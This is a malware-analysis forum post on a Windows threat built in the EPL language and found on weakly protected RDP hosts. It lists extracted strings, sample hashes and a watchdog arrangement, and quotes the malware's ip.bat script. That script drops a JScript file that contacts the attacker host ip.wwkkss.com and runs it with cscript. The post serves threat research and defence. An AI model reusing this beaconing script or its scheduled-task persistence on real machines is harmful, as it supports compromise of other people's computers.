A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #33095  by Xylitol
 Mon Jul 22, 2019 1:19 pm
Originaly found on weak rdps, after scanning china range, seem to be an old threat.
https://www.virustotal.com/graph/embed/ ... f973a94ccb

Image
Developped in EPL, guy of hexacorn did a post about theses PE files here: http://www.hexacorn.com/blog/2019/02/13 ... guage-epl/
AV detections (GData, ESET etc..) seem to get the signature name from the 'Software\FlySky\E\Install' registry key i suppose.
This one download a list of url from hxtp://wwkkss.com/a04.txt

fews strings:
Code: Select all
00000002157D   00001002157D      0   0000HTTP
0000000215BC   0000100215BC      0   http://www.eyuyan.com
0000000215D4   0000100215D4      0   service@dywt.com.cn
0000000215E8   0000100215E8      0   +86(0411)39895834
0000000215FC   0000100215FC      0   +86(0411)39895831
000000021640   000010021640      0   116001
0000000216B0   0000100216B0      0   707ca37322474f6ca841f0e224f4b620
0000000216D4   0000100216D4      0   This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info
000000023685   000010023685      0   service@dywt.com.cn
00000002373E   00001002373E      0   service@dywt.com.cn
00000002375A   00001002375A      0   sale@dywt.com.cn
000000023775   000010023775      0   service@dywt.com.cn;sale@dywt.com.cn
ASCII "internet_ProcessNotifyLib"
ASCII "us-ascii"
ASCII "gb2312"
ASCII "\r\n "
ASCII "=?gb2312?B?"
ASCII "?="
ASCII "gb2312"
ASCII "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ASCII "\r\n"
ASCII "%s <%s>"
ASCII "%+.2d%.2d"
ASCII "%a, %d %b %Y %H:%M:%S "
ASCII "From: %s\r\nTo: %s\r\nCc: %s\r\nSubject: %s\r\nDate: %s\r\n"
ASCII "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n"
ASCII "Reply-To: %s\r\n"
ASCII "MIME-Version: 1.0\r\nContent-type: multipart/mixed; boundary=\"#BOUNDARY#\"\r\n"
ASCII "MIME-Version: 1.0\r\nContent-type: text/plain; charset=\""
ASCII "\"\r\nContent-Transfer-Encoding: base64\r\n"
ASCII "\r\n"
ASCII "HELO %s\r\n"
ASCII "EHLO %s\r\n"
ASCII "AUTH"
ASCII "AUTH=LOGIN"
ASCII "LOGIN"
ASCII "PLAIN"
ASCII "AUTH PLAIN\r\n"
ASCII "AUTH PLAIN\r\n"
ASCII "AUTH LOGIN\r\n"
ASCII "AUTH LOGIN\r\n"
ASCII "QUIT\r\n"
ASCII "MAIL FROM:<%s>\r\n"
ASCII "RSET\r\n"
ASCII "RSET\r\n"
ASCII "DATA\r\n"
ASCII "DATA\r\n"
ASCII "\r\n--#BOUNDARY#\r\nContent-Type: text/plain; charset=\""
ASCII "\"\r\nContent-Transfer-Encoding: base64\r\n\r\n"
ASCII "\r\n\r\n--#BOUNDARY#\r\nContent-Type: application/octet-stream; name=%s\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment; filename=%s\r\n\r\n"
ASCII "\r\n--#BOUNDARY#--"
ASCII "\r\n--#BOUNDARY#--"
ASCII "\r\n.\r\n"
ASCII "\r\n.\r\n"
ASCII "RCPT TO:<%s>\r\n"
ESI=00000988
EAX=063BF5E2, (UNICODE "http://api.share.baidu.com/s.gif?l=http://www.nmgjinlan.com/zvgzfpzwmsgersrpusrzv1/")
jk.exe act as watchdog for yun.exe

krnln.fnr: https://www.virustotal.com/en/file/c77a ... /analysis/
yun.exe: https://www.virustotal.com/en/file/bb6a ... /analysis/
jk.exe: https://www.virustotal.com/en/file/7e38 ... /analysis/

some package have variation for example z01.zip from wwkkss.com/z01.zip
ip.bat:
Code: Select all
@echo off
set "name=yun.exe"
set "url=http://ip.wwkkss.com/core/jiekou.php"

(echo;var http=new ActiveXObject^('MSXML2.XMLHTTP'^);
echo;http.open^('GET', '%url%', false^);
echo;http.setRequestHeader^('User-Agent', 'Mozilla/5.0 ^(Windows NT 10.0; Win64; x64^) AppleWebKit/537.36 ^(KHTML, like Gecko^) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'^);
echo;http.send^(^);
echo;WSH.echo^(http.responseText^);)>"%tmp%\t.js"
tasklist /fi "IMAGENAME eq %name%" /fo csv /nh|find "%name%"&&(
    cscript -nologo -e:jscript "%tmp%\t.js"
)
there is also 'kill.bat'
Code: Select all
taskkill /f /im  yun.exe
on the infected computers, attacker have set a scheduled task to run this file each 10 mins, then jk.exe relaunch yun.exe
Attachments
(1.68 MiB) Downloaded 9 times